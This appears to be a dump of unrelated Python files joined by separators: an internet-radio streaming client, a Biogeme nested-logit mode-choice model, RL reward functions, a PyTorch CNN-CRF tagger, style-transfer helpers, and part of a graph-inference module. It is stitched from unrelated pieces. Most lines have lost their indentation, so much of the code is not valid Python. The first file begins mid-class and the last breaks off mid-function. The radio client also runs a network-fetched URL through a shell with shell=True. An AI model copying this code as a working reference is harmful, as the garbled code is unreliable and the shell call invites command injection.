def get_stream_icon(self, stream, mode):
if self._soups[mode] is None:
icons_url = 'http://{mode}.fm/'.format(mode=mode)
if BeautifulSoup is not None:
self._soups[mode] = BeautifulSoup(urllib2.urlopen(icons_url))
else:
raise Exception('Icon support requires the BeautifulSoup module')
soup = self._soups[mode]
stream_icon = soup.find('img', title=stream['name']).get('src', '')
return stream_icon
@identify_stream
def play_stream(self, stream):
stream_url = self.get_stream_url(stream=stream)
try:
with open('/dev/null', 'w') as dev_null:
return subprocess.call(self.player.format(stream_url=stream_url),
stdin=sys.stdin,
stdout=sys.stdout,
stderr=dev_null,
shell=True)
except TypeError as err:
raise StreamError(err)
except KeyboardInterrupt:
return None
@identify_stream
def get_stream_url(self, stream):
pls_url = stream['playlist']
if self.quality.startswith('premium'):
try:
pls_url = '{url}?{auth_key}'.format(
url=pls_url,
auth_key=self._config['auth_key'])
except KeyError:
raise ConfigError('Premium quality stations require auth_key')
return random.choice([line.strip().split('=')[1] \
for line in urllib2.urlopen(pls_url).read().strip().split('\n') \
if '=' in line and line.startswith('File')])
def _get_stream_list(self, mode):
if mode in MODES:
url = 'http://listen.{mode}.fm/{quality}/'.format(
mode=mode,
quality=self.quality)
with open(self._get_stream_list_cache_file(url), 'r') as strm_cache:
data = json.load(strm_cache)
return data
else:
raise InvalidMode(mode)
def _get_stream_list_cache_file(self, stream_list_url):
filename = '/var/tmp/diskyfm_stream_list_{url_hash}'.format(
url_hash=hashlib.md5(stream_list_url).hexdigest())
if not os.path.exists(filename) or \
time.time() - os.path.getmtime(filename) > self.STREAM_CACHE_TTL:
with open(filename, 'w') as strm_cache:
strm_cache.write(urllib2.urlopen(stream_list_url).read())
return filename
def _identify_stream_mode(self, stream):
for (m, s) in ((m, s) for m in MODES for s in self._get_stream_list(m)):
if stream == s:
return m
else:
raise InvalidStream(stream)
def _identify_stream(self, mode=None, **kwargs):
if not len(kwargs):
raise InvalidStream()
        if mode is None:
            stream_list = self.stream_list
        else:
            # honour the requested mode instead of scanning every mode
            stream_list = self._get_stream_list(mode)
for stream in stream_list:
if all(stream[key] == value for (key, value) in kwargs.iteritems()):
return stream
else:
raise InvalidStream(kwargs)
if __name__ == '__main__':
import sys
import optparse
import os.path
import ConfigParser
def get_options():
parser = optparse.OptionParser()
parser.add_option('-C', '--config-file', dest='config_file',
help='Use an alternate config file', metavar='FILE')
parser.add_option('-P', '--player', dest='player',
help='Use an alternate audio player', metavar='PLAYER')
        parser.add_option('-R', '--random-stream', dest='random_stream', action='store_true',
                          help='Play a randomly chosen stream')
parser.add_option('-m', '--mode', dest='mode', type='choice',
choices=MODES+['all'])
parser.add_option('-q', '--quality', type='choice',
choices=[x for k in QUALITIES.values() for x in k], help='Set the stream quality')
parser.add_option('-a', '--auth-key',
help='Set the auth key for premium streams')
parser.add_option('-l', '--list-streams', action='store_true',
help='List the available streams')
parser.add_option('-u', '--show-url', action='store_true',
help='Don\'t play the stream, just show the URL')
return parser.parse_args()
def get_config(config_file):
defaults = {
'player': DEFAULT_PLAYER,
'quality': 'public3',
'mode': 'all',
}
parser = ConfigParser.RawConfigParser(defaults)
try:
with open(config_file, 'r') as cf:
parser.readfp(cf, config_file)
        except (IOError, OSError):
pass
return dict(parser.items('global'))
(opts, args) = get_options()
opts = dict((k,v) for (k,v) in vars(opts).items() if v is not None)
try:
config = get_config(opts['config_file'])
except KeyError:
config = get_config(os.path.expanduser('~/.diskyfmrc'))
config.update(opts)
streamer = AudioAddictSite(**config)
if 'list_streams' in config:
stream_list = streamer.stream_list
stream_key_width = max(len(s['key']) for s in stream_list)
txt = u'\n'.join(u'{s[key]: <{width}} -- {s[name]}'.format(
width=stream_key_width, s=s) for s in stream_list)
print ''.join(c for c in txt if ord(c) < 128)
else:
if 'random_stream' in config:
stream_key = random.choice([s['key'] for s in streamer.stream_list])
else:
try:
stream_key = args[0]
except IndexError:
stream_key = config['default_stream_key']
if 'show_url' in config:
print streamer.get_stream_url(key=stream_key)
else:
print 'Streaming {stream_key} @ {quality}...'.format(
stream_key=stream_key,
quality=streamer.quality)
streamer.play_stream(key=stream_key)
|
<gh_stars>10-100
from biogeme import *
from headers import *
from nested import *
from loglikelihood import *
from statistics import *
#import random
cons_bus = Beta('bus cons',0,-10,10,0)
cons_mrt = Beta('MRT cons',0,-10,10,0)
cons_privatebus=Beta('private bus cons',0,-10,10,0)
cons_drive1=Beta('drive alone cons',0,-10,10,1)
cons_share2=Beta('share2 cons',0,-10,10,0)
cons_share3=Beta('share3 plus cons',0,-10,10,0)
cons_motor=Beta('motor cons',0,-20,10,0)
cons_walk=Beta('walk cons',0,-10,10,0)
cons_taxi=Beta('taxi cons',0,-10,10,0)
beta1_1_tt = Beta('travel time beta1_1 ivt',0,-10,10,0)
beta1_2_tt = Beta('travel time beta1_2 waiting',0,-10,10,0)
beta1_3_tt = Beta('travel time beta1_3 walk',0,-10,10,0)
beta_private_1_tt=Beta('travel time beta_private_1 ivt',0,-10,10,0)
#beta_private_2_tt=Beta('travel time beta_private_2 wait',0,-10,10,0)
#beta_private_3_tt=Beta('travel time beta_private_2 walk',0,-10,10,0)
#beta2_tt = Beta('travel time beta2',0,-10,10,0)
beta2_tt_drive1 = Beta('travel time beta drive1',0,-10,10,0)
beta2_tt_share2 = Beta('travel time beta share2',0,-10,10,0)
beta2_tt_share3 = Beta('travel time beta share3',0,-10,10,0)
beta2_tt_motor = Beta('travel time beta motor',0,-10,10,1)
beta_tt_walk =Beta('travel time beta walk',0,-10,10,0)
beta_tt_taxi =Beta('travel time beta taxi',0,-10,10,0)
bound=15
beta_cost= Beta('generic cost beta',0,-bound,bound,1)
beta4_2_cost = Beta('travel cost beta4_2',0,-bound,bound,1)
beta5_2_cost = Beta('travel cost beta5_2',0,-bound,bound,1)
beta6_2_cost = Beta('travel cost beta6_2',0,-bound,bound,1)
beta7_2_cost = Beta('travel cost beta7_2',0,-bound,bound,1)
beta8_2_cost = Beta('travel cost beta8_2',0,-bound,bound,1)
beta9_2_cost = Beta('travel cost beta9_2',0,-bound,bound,1)
beta10_2_cost = Beta('travel cost beta10_2',0,-bound,bound,1)
beta_cost_erp=Beta('beta for (1-d2)*erp in car',0,-bound,bound,1)
beta_cost_parking=Beta('beta for (1-d1)*parking in car',0,-bound,bound,1)
beta_central_bus=Beta('central dummy in bus',0,-10,10,0)
beta_central_mrt=Beta('central dummy in mrt',0,-10,10,0)
beta_central_privatebus=Beta('central dummy in privatebus',0,-10,10,0)
beta_central_share2=Beta('central dummy in share2',0,-10,10,0)
beta_central_share3=Beta('central dummy in share3 plus',0,-10,10,0)
beta_central_motor=Beta('central dummy in motor',0,-10,10,0)
beta_central_taxi=Beta('central dummy in taxi',0,-10,10,0)
beta_central_walk=Beta('central dummy in walk',0,-10,10,0)
beta_female_bus=Beta('female dummy in bus',0,-10,10,0)
beta_female_mrt=Beta('female dummy in mrt',0,-10,10,0)
beta_female_privatebus=Beta('female dummy in privatebus',0,-10,10,0)
beta_female_drive1=Beta('female dummy in drive1',0,-10,10,1)
beta_female_share2=Beta('female dummy in share2',0,-10,10,0)
beta_female_share3=Beta('female dummy in share3 plus',0,-10,10,0)
beta_female_motor=Beta('female dummy in motor',0,-10,10,1)
beta_female_taxi=Beta('female dummy in taxi',0,-10,10,0)
beta_female_walk=Beta('female dummy in walk',0,-10,10,0)
#beta_autoown_cardriver=Beta('auto ownership in cardriver',0,-10,10,0)
#beta_autoown_carpassenger=Beta('auto ownership in carpassenger',0,-10,10,0)
#beta_motorown=Beta('motorcycle ownership in motor',0,-10,10,0)
beta_zero_drive1=Beta('zero cars in drive1',0,-10,10,1)
beta_oneplus_drive1=Beta('one plus cars in drive1',0,-10,10,1)
beta_twoplus_drive1=Beta('two plus cars in drive1',0,-10,10,1)
beta_threeplus_drive1=Beta('three plus cars in drive1',0,-10,30,1)
beta_zero_share2=Beta('zero cars in share2',0,-10,10,1)
beta_oneplus_share2=Beta('one plus cars in share2',0,-10,10,0)
beta_twoplus_share2=Beta('two plus cars in share2',0,-10,10,0)
beta_threeplus_share2=Beta('three plus cars in share2',0,-10,10,0)
beta_zero_share3=Beta('zero cars in share3 plus',0,-10,10,1)
beta_oneplus_share3=Beta('one plus cars in share3 plus',0,-10,10,0)
beta_twoplus_share3=Beta('two plus cars in share3 plus',0,-10,10,0)
beta_threeplus_share3=Beta('three plus cars in share3 plus',0,-30,10,1)
beta_zero_motor=Beta('zero motors in motor',0,-10,10,1)
beta_oneplus_motor=Beta('one plus motors in motor',0,-10,10,1)
beta_twoplus_motor=Beta('two plus motors in motor',0,-10,10,1)
beta_threeplus_motor=Beta('three plus motors in motor',0,-10,10,1)
beta_transfer=Beta('average transfer number in bus and mrt', 0,-10,10,1)
beta_distance=Beta('distance in private bus',0,-10,10,0)
beta_residence=Beta('home zone residential size in private bus',0,-10,10,0)
beta_residence_2=Beta('square of home zone residential size in private bus',0,-10,10,1)
beta_attraction=Beta('work zone work attraction in private bus',0,-10,10,0)
beta_attraction_2=Beta('square of work zone work attraction in private bus',0,-10,10,1)
MU1 = Beta('MU for car',1,1,100,0)
MU2 = Beta('MU for PT', 1,1,100,0)
beta_age_over_15_bus= Beta('Beta for age over 15 dummy in bus',0,-10,10,0)
beta_age_over_15_mrt= Beta('Beta for age over 15 dummy in mrt',0,-10,10,0)
beta_age_over_15_private_bus= Beta('Beta for age over 15 dummy in private bus',0,-10,10,1)
beta_age_over_15_drive1= Beta('Beta for age over 15 dummy in drive1',0,-10,10,1)
beta_age_over_15_share2= Beta('Beta for age over 15 dummy in share2',0,-10,10,0)
beta_age_over_15_share3= Beta('Beta for age over 15 dummy in share3',0,-10,10,1)
beta_age_over_15_motor= Beta('Beta for age over 15 dummy in motor',0,-10,10,1)
beta_age_over_15_walk= Beta('Beta for age over 15 dummy in walk',0,-10,10,0)
beta_age_over_15_taxi= Beta('Beta for age over 15 dummy in taxi',0,-10,10,0)
beta_university_student_bus= Beta('Beta for university student dummy in bus',0,-10,10,0)
beta_university_student_mrt= Beta('Beta for university student dummy in mrt',0,-10,10,0)
beta_university_student_private_bus= Beta('Beta for university student dummy in private bus',0,-10,10,0)
beta_university_student_drive1= Beta('Beta for university student dummy in drive1',0,-10,10,1)
beta_university_student_share2= Beta('Beta for university student dummy in share2',0,-10,10,0)
beta_university_student_share3= Beta('Beta for university student dummy in share3',0,-10,10,1)
beta_university_student_motor= Beta('Beta for university student dummy in motor',0,-10,10,1)
beta_university_student_walk= Beta('Beta for university student dummy in walk',0,-10,10,1)
beta_university_student_taxi= Beta('Beta for university student dummy in taxi',0,-10,10,0)
beta_distance_motor=Beta('distance in motor',0,-10,10,1)
#define cost and travel time
cost_bus=cost_public_first+cost_public_second
cost_mrt=cost_public_first+cost_public_second
cost_privatebus=cost_public_first+cost_public_second
cost_cardriver=cost_car_ERP_first+cost_car_ERP_second+cost_car_OP_first+cost_car_OP_second+cost_car_parking
cost_carpassenger=cost_car_ERP_first+cost_car_ERP_second+cost_car_OP_first+cost_car_OP_second+cost_car_parking
cost_motor=0.5*(cost_car_ERP_first+cost_car_ERP_second+cost_car_OP_first+cost_car_OP_second)+0.65*cost_car_parking
d1=walk_distance1
d2=walk_distance2
cost_taxi_1=3.4+((d1*(d1>10)-10*(d1>10))/0.35+(d1*(d1<=10)+10*(d1>10))/0.4)*0.22+ cost_car_ERP_first + Central_dummy*3
cost_taxi_2=3.4+((d2*(d2>10)-10*(d2>10))/0.35+(d2*(d2<=10)+10*(d2>10))/0.4)*0.22+ cost_car_ERP_second + Central_dummy*3
cost_taxi=cost_taxi_1+cost_taxi_2
tt_bus_ivt=tt_public_ivt_first+tt_public_ivt_second
tt_bus_wait=tt_public_waiting_first+tt_public_waiting_second
tt_bus_walk=tt_public_walk_first+tt_public_walk_second
tt_bus_all=tt_bus_ivt+tt_bus_wait+tt_bus_walk
tt_mrt_ivt=tt_public_ivt_first+tt_public_ivt_second
tt_mrt_wait=tt_public_waiting_first+tt_public_waiting_second
tt_mrt_walk=tt_public_walk_first+tt_public_walk_second
tt_mrt_all=tt_mrt_ivt+tt_mrt_wait+tt_mrt_walk
#tt_privatebus_ivt=tt_public_ivt_first+tt_public_ivt_second
tt_privatebus_ivt=tt_ivt_car_first+tt_ivt_car_second
tt_privatebus_wait=tt_public_waiting_first+tt_public_waiting_second
tt_privatebus_walk=tt_public_walk_first+tt_public_walk_second
tt_privatebus_all=tt_privatebus_ivt+tt_privatebus_wait+tt_privatebus_walk
tt_cardriver_ivt=tt_ivt_car_first+tt_ivt_car_second
tt_cardriver_out=1.0/6
tt_cardriver_all=tt_cardriver_ivt+tt_cardriver_out
tt_carpassenger_ivt=tt_ivt_car_first+tt_ivt_car_second
tt_carpassenger_out=1.0/6
tt_carpassenger_all=tt_carpassenger_ivt+tt_carpassenger_out
tt_motor_ivt=tt_ivt_car_first+tt_ivt_car_second
tt_motor_out=1.0/6
tt_motor_all=tt_motor_ivt+tt_motor_out
tt_walk=walk_time_first+walk_time_second
tt_taxi_ivt=tt_ivt_car_first+tt_ivt_car_second
tt_taxi_out=1.0/6
tt_taxi_all=tt_taxi_ivt+tt_taxi_out
age_over_15=1*(age_num>=3)
university_student=1*(student_type_num==6)
residential_size=resident_student/origin_area/10000.0
school_attraction=education_op/destination_area/10000.0
#V1=public bus       -bus
#V2=MRT              -mrt
#V3=private bus      -privatebus
#V4=drive alone      -drive1 (base)
#V5=shared ride (2)  -share2
#V6=shared ride (3+) -share3
#V7=motorcycle       -motor
#V8=walk             -walk
#V9=taxi             -taxi
V1 = cons_bus + beta1_1_tt * tt_bus_ivt + beta1_2_tt * tt_bus_walk + beta1_3_tt * tt_bus_wait + beta_cost * cost_bus + beta_central_bus * Central_dummy + beta_transfer * average_transfer_number+beta_female_bus * Female_dummy + age_over_15*beta_age_over_15_bus + university_student * beta_university_student_bus
V2 = cons_mrt + beta1_1_tt * tt_mrt_ivt + beta1_2_tt * tt_mrt_walk + beta1_3_tt * tt_mrt_wait + beta_cost * cost_mrt + beta_central_mrt * Central_dummy + beta_transfer * average_transfer_number+beta_female_mrt * Female_dummy + age_over_15*beta_age_over_15_mrt + university_student * beta_university_student_mrt
V3 = cons_privatebus + beta_private_1_tt * tt_privatebus_ivt + beta_cost * cost_privatebus + beta_central_privatebus * Central_dummy+beta_distance*(d1+d2)+beta_residence*residential_size+beta_attraction*school_attraction+beta_residence_2*residential_size**2+beta_attraction_2*school_attraction**2+beta_female_privatebus* Female_dummy + age_over_15*beta_age_over_15_private_bus + university_student * beta_university_student_private_bus
V4 = cons_drive1 + beta2_tt_drive1 * tt_cardriver_all + beta_cost * cost_cardriver + beta_female_drive1 * Female_dummy + beta_zero_drive1 * zero_car + beta_oneplus_drive1 * one_plus_car + beta_twoplus_drive1 * two_plus_car + beta_threeplus_drive1 * three_plus_car+beta_cost_erp*(1-d2_dummy)*(cost_car_ERP_first+cost_car_ERP_second)+beta_cost_parking*(1-d1_dummy)*cost_car_parking + age_over_15*beta_age_over_15_drive1 + university_student * beta_university_student_drive1
V5 = cons_share2 + beta2_tt_share2 * tt_carpassenger_all + beta_cost * cost_carpassenger/2.0 + beta_central_share2 * Central_dummy + beta_female_share2 * Female_dummy + beta_zero_share2 * zero_car + beta_oneplus_share2 * one_plus_car + beta_twoplus_share2 * two_plus_car + beta_threeplus_share2 * three_plus_car + age_over_15*beta_age_over_15_share2 + university_student * beta_university_student_share2
V6 = cons_share3 + beta2_tt_share3 * tt_carpassenger_all + beta_cost * cost_carpassenger/3.0 + beta_central_share3 * Central_dummy + beta_female_share3 * Female_dummy + beta_zero_share3 * zero_car + beta_oneplus_share3 * one_plus_car + beta_twoplus_share3 * two_plus_car + beta_threeplus_share3 * three_plus_car + age_over_15*beta_age_over_15_share3 + university_student * beta_university_student_share3
V7 = cons_motor + beta2_tt_motor * tt_motor_all + beta_cost * cost_motor + beta_central_motor * Central_dummy + beta_zero_motor * zero_motor + beta_oneplus_motor * one_plus_motor + beta_twoplus_motor * two_plus_motor + beta_threeplus_motor * three_plus_motor + beta_female_motor * Female_dummy + age_over_15*beta_age_over_15_motor + university_student * beta_university_student_motor + beta_distance_motor * (d1+d2)
V8 = cons_walk + beta_tt_walk * tt_walk + beta_central_walk * Central_dummy+ beta_female_walk * Female_dummy + age_over_15*beta_age_over_15_walk + university_student * beta_university_student_walk
V9 = cons_taxi + beta_tt_taxi * tt_taxi_all + beta_cost * cost_taxi + beta_central_taxi * Central_dummy + beta_female_taxi * Female_dummy + age_over_15*beta_age_over_15_taxi + university_student * beta_university_student_taxi
V = {1:V1,2: V2,3:V3,4:V4,5:V5,6:V6,7:V7,8:V8,9:V9}
av= {1:bus_avail_dummy,2:mrt_avail_dummy,3:private_bus_avail_dummy,4:car_driver_avail_dummy,5:car_passenger_avail_dummy,6: car_passenger_avail_dummy,7:motor_avail_dummy_all,8:walk_avail_dummy,9:taxi_avail_dummy}
#Definition of nests:
# 1: nests parameter
# 2: list of alternatives
car = MU1 , [4,5,6,7]
PT = MU2 , [1,2,3]
other = 1.0, [8,9]
nests = car,PT,other
#nests=car,PT,private,motor,walk,taxi
# The choice model is a nested logit, with availability conditions
prob = nested(V,av,nests,choice_new)
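# Sketch of the nested logit form assumed by nested(V, av, nests, choice)
# (standard formulation; the exact Biogeme normalization may differ slightly).
# For an available alternative i in nest m with scale MU_m:
#   P(i|m) = exp(MU_m * V_i) / sum_{j in m, available} exp(MU_m * V_j)
#   IV_m   = (1 / MU_m) * log( sum_{j in m, available} exp(MU_m * V_j) )
#   P(m)   = exp(IV_m) / sum_n exp(IV_n)
#   P(i)   = P(i|m) * P(m)
# MU_m >= 1; with MU_m = 1 a nest collapses to plain multinomial logit,
# which is why the 'other' nest above uses a fixed parameter of 1.0.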
rowIterator('obsIter')
BIOGEME_OBJECT.ESTIMATE = Sum(log(prob),'obsIter')
exclude = ((choice==0)+(PrimaryActivityIndex!=3)+(avail_violation==1)+(student_type_num==11)) > 0
BIOGEME_OBJECT.EXCLUDE = exclude
nullLoglikelihood(av,'obsIter')
choiceSet = [1,2,3,4,5,6,7,8,9]
cteLoglikelihood(choiceSet,choice_new,'obsIter')
availabilityStatistics(av,'obsIter')
BIOGEME_OBJECT.PARAMETERS['optimizationAlgorithm'] = "CFSQP"
BIOGEME_OBJECT.PARAMETERS['checkDerivatives'] = "1"
BIOGEME_OBJECT.PARAMETERS['numberOfThreads'] = "4"
|
<gh_stars>1-10
import math
import numpy as np
def resolve_reward(name):
rewards = {
"manhattan_distance": manhattan_distance,
"euclidean_distance": euclidean_distance,
"binary": binary,
"mo_time_score": mo_time_score,
"mo_death": mo_death,
"mo_success": mo_success,
"mo_compound": mo_compound,
"collision": collision
}
return rewards[name]
def resolve_multiple_rewards(names):
functions = names.split(",")
for i in range(len(functions)):
functions[i] = resolve_reward(functions[i].strip())
# print("functions:", functions)
return functions
def manhattan_distance(params):
"""
    Manhattan distance reward from the current position to the target.
    Args:
        params (tuple): (current, target, solution) where
            current (tuple): x, y coordinates of the current position,
            target (tuple): x, y coordinates of the target,
            solution (bool): whether a solution exists (a -100 penalty is
                returned when it does not).
    Returns:
        (float): negative Manhattan distance, plus a +100 bonus when the
            target is reached
"""
current, target, solution = params
if not solution:
return -100
dist = abs(target[0] - current[0]) + abs(target[1] - current[1])
target_reached = dist == 0
return -dist + (100 * target_reached)
def euclidean_distance(params):
current, target = params
# if not solution:
# return -100
# max_dist = np.sqrt(2*10**2)
dist = -np.linalg.norm(np.subtract(np.array(current), np.array(target)))
# dist = -np.sqrt( (current[0] - target[0])**2 + (current[1] - target[1])**2 )
# norm_dist = dist/max_dist
# print("dist, max_dist, norm_dist:", (dist, max_dist, norm_dist))
return dist
def collision(params):
def is_inside(current, obstacle):
"""
Returns whether current is inside obstacle
"""
a = obstacle.pt1
b = obstacle.pt2
num_total = 0
if current[0] in range(int(math.floor(min(a[0], b[0]))), int(math.ceil(max(a[0], b[0]) + 1))):
num_total += 1
if current[1] in range(int(math.floor(min(a[1], b[1]))), int(math.ceil(max(a[1], b[1]) + 1))):
num_total += 1
if current[2] in range(int(math.floor(min(a[2], b[2]))), int(math.ceil(max(a[2], b[2]) + 1))):
num_total += 1
if num_total == 3:
return True
return False
(current, obstacles) = params
for obstacle in obstacles:
if is_inside(current, obstacle):
return -50
return -1
def binary(params):
current, target, solution = params
if not solution:
return -100
if list(current) == list(target):
return 1
return -1
def mo_compound(params):
time_score, distance, died, success = params
# return (-distance*time_score*(1-died*-1) + 7000)*.001
max_dist = np.sqrt(2*10**2)
max_time = 40
# print([-distance/max_dist, time_score/max_time, (1-died*-1)])
return -distance/max_dist + time_score/max_time + (1-died*-1)
def mo_time_score(params):
score = params
return score
def mo_death(params):
died = params
return died*-1
def mo_success(params):
success = params
return success*2
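# Hypothetical usage sketch (not part of the original module): resolve reward
# functions by name and evaluate them on toy inputs, following the parameter
# conventions of the functions above.
if __name__ == "__main__":
    reward_fns = resolve_multiple_rewards("manhattan_distance, binary")
    current, target, solution = (0, 0), (3, 4), True
    for fn in reward_fns:
        # both functions unpack a (current, target, solution) tuple
        print(fn.__name__, fn((current, target, solution)))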
|
import torch
import torch.nn as nn
from deepbond import constants
from deepbond.initialization import init_xavier, init_kaiming
from deepbond.models.model import Model
from deepbond.modules.crf import CRF
class CNNCRF(Model):
"""CNN with CRF on top"""
def __init__(self, words_field, tags_field, options):
super().__init__(words_field, tags_field)
#
# Embeddings
#
word_embeddings = None
if self.words_field.vocab.vectors is not None:
word_embeddings = self.words_field.vocab.vectors
options.word_embeddings_size = word_embeddings.size(1)
self.word_emb = nn.Embedding(
num_embeddings=len(self.words_field.vocab),
embedding_dim=options.word_embeddings_size,
padding_idx=constants.PAD_ID,
_weight=word_embeddings,
)
self.dropout_emb = nn.Dropout(options.emb_dropout)
if options.freeze_embeddings:
self.word_emb.weight.requires_grad = False
features_size = options.word_embeddings_size
#
# CNN 1D
#
self.cnn_1d = nn.Conv1d(in_channels=features_size,
out_channels=options.conv_size,
kernel_size=options.kernel_size,
padding=options.kernel_size // 2)
self.max_pool = nn.MaxPool1d(options.pool_length,
padding=options.pool_length // 2)
self.dropout_cnn = nn.Dropout(options.cnn_dropout)
self.relu = torch.nn.ReLU()
features_size = (options.conv_size // options.pool_length +
options.pool_length // 2)
#
# Linear
#
self.linear_out = nn.Linear(features_size, self.nb_classes)
self.crf = CRF(
self.nb_classes,
bos_tag_id=self.tags_field.vocab.stoi['_'], # hack
eos_tag_id=self.tags_field.vocab.stoi['.'], # hack
pad_tag_id=None,
batch_first=True,
)
self.init_weights()
self.is_built = True
def init_weights(self):
if self.cnn_1d is not None:
init_kaiming(self.cnn_1d, dist='uniform', nonlinearity='relu')
if self.linear_out is not None:
init_xavier(self.linear_out, dist='uniform')
def build_loss(self, loss_weights=None):
self._loss = self.crf
def loss(self, emissions, gold):
mask = gold != constants.TAGS_PAD_ID
crf_gold = gold.clone()
crf_gold[mask == 0] = 0
return self._loss(emissions, crf_gold, mask=mask.float())
def predict_classes(self, batch):
emissions = self.forward(batch)
mask = batch.words != constants.PAD_ID
_, path = self.crf.decode(emissions, mask=mask[:, 2:].float())
return [torch.tensor(p) for p in path]
def predict_proba(self, batch):
raise Exception('Predict() probability is not available.')
def forward(self, batch):
assert self.is_built
assert self._loss is not None
h = batch.words
# mask = h != constants.PAD_ID
# (bs, ts) -> (bs, ts, emb_dim)
h = self.word_emb(h)
h = self.dropout_emb(h)
# Turn (bs, ts, emb_dim) into (bs, emb_dim, ts) for CNN
h = h.transpose(1, 2)
# (bs, emb_dim, ts) -> (bs, conv_size, ts)
h = self.relu(self.cnn_1d(h))
# Turn (bs, conv_size, ts) into (bs, ts, conv_size) for Pooling
h = h.transpose(1, 2)
# (bs, ts, conv_size) -> (bs, ts, pool_size)
h = self.max_pool(h)
h = self.dropout_cnn(h)
# (bs, ts, pool_size) -> (bs, ts, nb_classes)
h = self.linear_out(h)
# remove <bos> and <eos> tokens
# (bs, ts, nb_classes) -> (bs, ts-2, nb_classes)
h = h[:, 1:-1, :]
return h
|
from argparse import ArgumentParser
from PIL import Image
from keras.preprocessing.image import load_img, img_to_array
import keras.backend as K
from keras.applications.vgg16 import preprocess_input
import numpy as np
from keras.applications import VGG16
from Settings import *
def build_parser():
parser = ArgumentParser()
parser.add_argument('--content', dest='content', required=True,
help='Content image, e.g. "input.jpg"')
parser.add_argument('--style', dest='style', required=True,
help='Style image, e.g. "style.jpg"')
parser.add_argument('--output', dest='output', required=True,
help='Output image, e.g. "output.jpg"')
    parser.add_argument('--iter', dest='iter', required=False, default=400,
                        help='Number of iterations; default and suggested 400, ideally a multiple of 50')
    parser.add_argument('--record', dest='record', required=False, default='F',
                        help='Whether to record the loss ("T" to record)')
    parser.add_argument('--flw', dest='flw', required=False, default='0',
                        help='Feature weight selected')
    parser.add_argument('--lt', dest='losstype', required=False, default='SE',
                        help='Loss type selected')
    parser.add_argument('--rstep', dest='rstep', required=False, default='50',
                        help='Record a picture every this many steps')
    parser.add_argument('--alpha', dest='alpha', required=False, default='1.0',
                        help='alpha')
    parser.add_argument('--beta', dest='beta', required=False, default='10000.0',
                        help='beta')
    parser.add_argument('--fromc', dest='fromc', required=False, default='F',
                        help='Initialize the output image from the content image')
    parser.add_argument('--cont', dest='continueTraining', required=False, default='F',
                        help='Activate continuous training mode')
return parser
def inputImageUtils(imagePath,size):
"""
    Load and preprocess the input image.
    Return the preprocessed image array and the original image size.
"""
rawImage=Image.open(imagePath)
rawImageSize=rawImage.size
image=load_img(path=imagePath,target_size=size)
ImageArray=img_to_array(image)
ImageArray=K.variable(preprocess_input(np.expand_dims(ImageArray, axis=0)), dtype='float32')
return ImageArray,rawImageSize
def outImageUtils(width,height):
"""
    Initialize the output image with random noise.
    Return the initialized image and a placeholder used for computation.
"""
output=np.random.randint(256, size=(width, height, 3)).astype('float64')
output = preprocess_input(np.expand_dims(output, axis=0))
outputPlaceholder=K.placeholder(shape=(1, width,height, 3))
return output,outputPlaceholder
def outImageUtils2(imagePath,width,height):
"""
    Initialize the output image from the content image.
"""
img=Image.open(imagePath)
img=img.resize((width,height))
imgarr=np.array(img)
output=preprocess_array(imgarr)
outputPlaceholder=K.placeholder(shape=(1,width,height,3))
return output,outputPlaceholder
def save_original_size(x,path, target_size):
"""
    Save the output image at its original size.
"""
xIm = Image.fromarray(x)
xIm = xIm.resize(target_size)
xIm.save(path)
return xIm
def BuildModel(contentImgArr,styleImgArr,outputPlaceholder):
contentModel = VGG16(include_top=False, weights='imagenet', input_tensor=contentImgArr)
styleModel = VGG16(include_top=False, weights='imagenet', input_tensor=styleImgArr)
outModel = VGG16(include_top=False, weights='imagenet', input_tensor=outputPlaceholder)
return contentModel,styleModel,outModel
def postprocess_array(x):
    # Undo the zero-centering by adding the ImageNet mean pixel back
if x.shape != (WIDTH, HEIGHT, 3):
x = x.reshape((WIDTH,HEIGHT, 3))
x[..., 0] += 103.939
x[..., 1] += 116.779
x[..., 2] += 123.68
# 'BGR'->'RGB'
x = x[..., ::-1]
x = np.clip(x, 0, 255)
x = x.astype('uint8')
return x
def preprocess_array(x):
if x.shape != (WIDTH, HEIGHT, 3):
x = x.reshape((WIDTH,HEIGHT, 3))
# RGB -> BGR
x = x.astype('float64')
x = x[:, :, ::-1]
x[:, :, 0] -= 103.939
x[:, :, 1] -= 116.779
x[:, :, 2] -= 123.68
return x
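# Hypothetical usage sketch (not part of the original module): round-trip an
# array through preprocess_array/postprocess_array. WIDTH and HEIGHT are
# expected to come from Settings (imported above with `from Settings import *`).
if __name__ == "__main__":
    raw = np.random.randint(0, 256, size=(WIDTH, HEIGHT, 3)).astype('float64')
    x = preprocess_array(raw.copy())   # RGB -> BGR, subtract ImageNet channel means
    img = postprocess_array(x.copy())  # add the means back, BGR -> RGB, clip to uint8
    print(img.shape)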
|
<gh_stars>0
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
import utool as ut
import vtool as vt # NOQA
import plottool as pt
import six
import networkx as nx
print, rrr, profile = ut.inject2(__name__, '[graph_inference]')
# Monkey patch networkx
nx.set_edge_attrs = nx.set_edge_attributes
nx.get_edge_attrs = nx.get_edge_attributes
nx.set_node_attrs = nx.set_node_attributes
nx.get_node_attrs = nx.get_node_attributes
CUT_WEIGHT_KEY = 'cut_weight'
def _dz(a, b):
a = a.tolist() if isinstance(a, np.ndarray) else list(a)
b = b.tolist() if isinstance(b, np.ndarray) else list(b)
if len(a) == 0 and len(b) == 1:
# This introduces a corner case
b = []
elif len(b) == 1 and len(a) > 1:
b = b * len(a)
assert len(a) == len(b), 'out of alignment a=%r, b=%r' % (a, b)
return dict(zip(a, b))
def get_cm_breaking(qreq_, cm_list, ranks_top=None, ranks_bot=None):
"""
>>> from ibeis.algo.hots.graph_iden import * # NOQA
"""
# Construct K-broken graph
edges = []
if ranks_bot is None:
ranks_bot = 0
for count, cm in enumerate(cm_list):
score_list = cm.annot_score_list
rank_list = ut.argsort(score_list)[::-1]
sortx = ut.argsort(rank_list)
top_sortx = sortx[:ranks_top]
bot_sortx = sortx[-ranks_bot:]
short_sortx = ut.unique(top_sortx + bot_sortx)
daid_list = ut.take(cm.daid_list, short_sortx)
for daid in daid_list:
u, v = (cm.qaid, daid)
if v < u:
u, v = v, u
edges.append((u, v))
return edges
def estimate_threshold(curve, method=None):
"""
import plottool as pt
idx3 = vt.find_elbow_point(curve[idx1:idx2 + 1]) + idx1
pt.plot(curve)
pt.plot(idx1, curve[idx1], 'bo')
pt.plot(idx2, curve[idx2], 'ro')
pt.plot(idx3, curve[idx3], 'go')
"""
if len(curve) == 0:
return None
if method is None:
method = 'mean'
if method == 'mean':
thresh = np.mean(curve)
elif method == 'elbow':
